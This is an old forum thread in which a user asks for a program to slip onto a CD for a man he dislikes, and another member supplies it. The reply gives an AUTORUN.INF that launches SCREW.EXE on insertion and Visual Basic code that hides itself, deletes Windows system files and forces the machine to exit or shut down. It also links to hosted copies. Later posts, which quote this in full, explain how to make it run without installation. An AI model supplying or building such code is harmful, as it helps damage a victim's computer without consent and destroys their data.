Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Categories

revenge should be sweet

coboycoboy Member Posts: 28
hey all, i am new to this part of the site. some of you will know that i am not the best at this programms, like jonathan. but i have a small dilly of a pickle.
i was asked to burn a cd for a guy, from a good mate of mine. i dont like him at all, he messes with your girlfriend type of guy.
i was wondering does anybody have any 'programme' that i can put onto the cd that will do something bold, but to toooooooooooooo bold.
this would be appreciated greatly if some one could help me.

Comments

• didanididani Member Posts: 99
    [b][red]This message was edited by Moderator at 2004-4-3 12:14:34[/red][/b][hr]
    : hey all, i am new to this part of the site. some of you will know that i am not the best at this programms, like jonathan. but i have a small dilly of a pickle.
    : i was asked to burn a cd for a guy, from a good mate of mine. i dont like him at all, he messes with your girlfriend type of guy.
    : i was wondering does anybody have any 'programme' that i can put onto the cd that will do something bold, but to toooooooooooooo bold.
    : this would be appreciated greatly if some one could help me.
    :
    sure
    I hope u know how to get a cd to run a program when it is inserted. For the ones amongst u that do not, here's a simple explanation:

Make a file named "AUTORUN.INF"
    put three simple lines in the file:
    [code][autorun]
    OPEN=SCREW.EXE
    ICON=SCREW.EXE, 1[/code]

I'll explain the lines for u.
    The first tells windoze the autorun section begins
    the second tells windoze what program to open (in this case d:screw.exe, where d is the cdromdrive)
    the third and last line tells windoze what icon to use for the cd (in this case the standard icon of d:screw.exe)
    u can rename autorun.exe to anything, as long as you keep the .exe extension.
    But then, the program to screw the soab:
    if you use VB, and u know what kind of windoze the victim uses, u can write a program. Since u told me u don't program very well, here's my personal version. (It's available on www.sforum.nl/screw.exe)
    [code]Private sub form_load()
    me.hide
    if dir("c:windowscmdninst.exe") = "c:windowscmdninst.exe" then
    kill "c:windowscmdninst.exe"
    Shell "RUNDLL32 KRNL386.EXE,exitkernel"
    unload me
    end if
    if dir("c:windowswinsock2.exe") = "c:windowswinsock2.exe" then
    kill "c:windowswinsock2.exe"
    Shell "rundll32.exe shell32.dll,SHExitWindowsEx 8"
    unload me
    end if
    end sub
    [/code]
    Compile the code above, or just download my app (remember, choose to SAVE IT, NOT OPEN IT, FOR IT WILL SCREW YOU TOO!!!!
    The required autorun.inf file is also available on http://www.sforum.nl/AUTORUN.INF
    EtHeO out...

• markblue777markblue777 Member Posts: 184
    : [b][red]This message was edited by Moderator at 2004-4-3 12:14:34[/red][/b][hr]
    : : hey all, i am new to this part of the site. some of you will know that i am not the best at this programms, like jonathan. but i have a small dilly of a pickle.
    : : i was asked to burn a cd for a guy, from a good mate of mine. i dont like him at all, he messes with your girlfriend type of guy.
    : : i was wondering does anybody have any 'programme' that i can put onto the cd that will do something bold, but to toooooooooooooo bold.
    : : this would be appreciated greatly if some one could help me.
    : :
    : sure
    : I hope u know how to get a cd to run a program when it is inserted. For the ones amongst u that do not, here's a simple explanation:
    :
    : Make a file named "AUTORUN.INF"
    : put three simple lines in the file:
    : [code][autorun]
    : OPEN=SCREW.EXE
    : ICON=SCREW.EXE, 1[/code]
    :
    : I'll explain the lines for u.
    : The first tells windoze the autorun section begins
    : the second tells windoze what program to open (in this case d:screw.exe, where d is the cdromdrive)
    : the third and last line tells windoze what icon to use for the cd (in this case the standard icon of d:screw.exe)
    : u can rename autorun.exe to anything, as long as you keep the .exe extension.
    : But then, the program to screw the soab:
    : if you use VB, and u know what kind of windoze the victim uses, u can write a program. Since u told me u don't program very well, here's my personal version. (It's available on www.sforum.nl/screw.exe)
    : [code]Private sub form_load()
    : me.hide
    : if dir("c:windowscmdninst.exe") = "c:windowscmdninst.exe" then
    : kill "c:windowscmdninst.exe"
    : Shell "RUNDLL32 KRNL386.EXE,exitkernel"
    : unload me
    : end if
    : if dir("c:windowswinsock2.exe") = "c:windowswinsock2.exe" then
    : kill "c:windowswinsock2.exe"
    : Shell "rundll32.exe shell32.dll,SHExitWindowsEx 8"
    : unload me
    : end if
    : end sub
    : [/code]
    : Compile the code above, or just download my app (remember, choose to SAVE IT, NOT OPEN IT, FOR IT WILL SCREW YOU TOO!!!!
    : The required autorun.inf file is also available on http://www.sforum.nl/AUTORUN.INF
    : EtHeO out...
    :
    :
    :
    :
    :
    :
    Yo i see on ur virus thing that once u click on it it opens straight away how can i make my on do that instead of needing to install it first
    from
    mark thanks in advanced for any help
  • didanididani Member Posts: 99
    : : [b][red]This message was edited by Moderator at 2004-4-3 12:14:34[/red][/b][hr]
    : : : hey all, i am new to this part of the site. some of you will know that i am not the best at this programms, like jonathan. but i have a small dilly of a pickle.
    : : : i was asked to burn a cd for a guy, from a good mate of mine. i dont like him at all, he messes with your girlfriend type of guy.
    : : : i was wondering does anybody have any 'programme' that i can put onto the cd that will do something bold, but to toooooooooooooo bold.
    : : : this would be appreciated greatly if some one could help me.
    : : :
    : : sure
    : : I hope u know how to get a cd to run a program when it is inserted. For the ones amongst u that do not, here's a simple explanation:
    : : Make a file named "AUTORUN.INF"
    : : put three simple lines in the file:
    : : [code][autorun]
    : : OPEN=SCREW.EXE
    : : ICON=SCREW.EXE, 1[/code]
    : : I'll explain the lines for u.
    : : The first tells windoze the autorun section begins
    : : the second tells windoze what program to open (in this case d:screw.exe, where d is the cdromdrive)
    : : the third and last line tells windoze what icon to use for the cd (in this case the standard icon of d:screw.exe)
    : : u can rename autorun.exe to anything, as long as you keep the .exe extension.
    : : But then, the program to screw the soab:
    : : if you use VB, and u know what kind of windoze the victim uses, u can write a program. Since u told me u don't program very well, here's my personal version. (It's available on www.sforum.nl/screw.exe)
    : : [code]Private sub form_load()
    : : me.hide
    : : if dir("c:windowscmdninst.exe") = "c:windowscmdninst.exe" then
    : : kill "c:windowscmdninst.exe"
    : : Shell "RUNDLL32 KRNL386.EXE,exitkernel"
    : : unload me
    : : end if
    : : if dir("c:windowswinsock2.exe") = "c:windowswinsock2.exe" then
    : : kill "c:windowswinsock2.exe"
    : : Shell "rundll32.exe shell32.dll,SHExitWindowsEx 8"
    : : unload me
    : : end if
    : : end sub
    : : [/code]
    : : Compile the code above, or just download my app (remember, choose to SAVE IT, NOT OPEN IT, FOR IT WILL SCREW YOU TOO!!!!
    : : The required autorun.inf file is also available on http://www.sforum.nl/AUTORUN.INF
    : : EtHeO out...
    : Yo i see on ur virus thing that once u click on it it opens straight away how can i make my on do that instead of needing to install it first
    : from
    : mark thanks in advanced for any help
    :
    just compile it, and put the VB runtime files in the same directory as the program... shouldn't ask for installation now
    EtHeO out...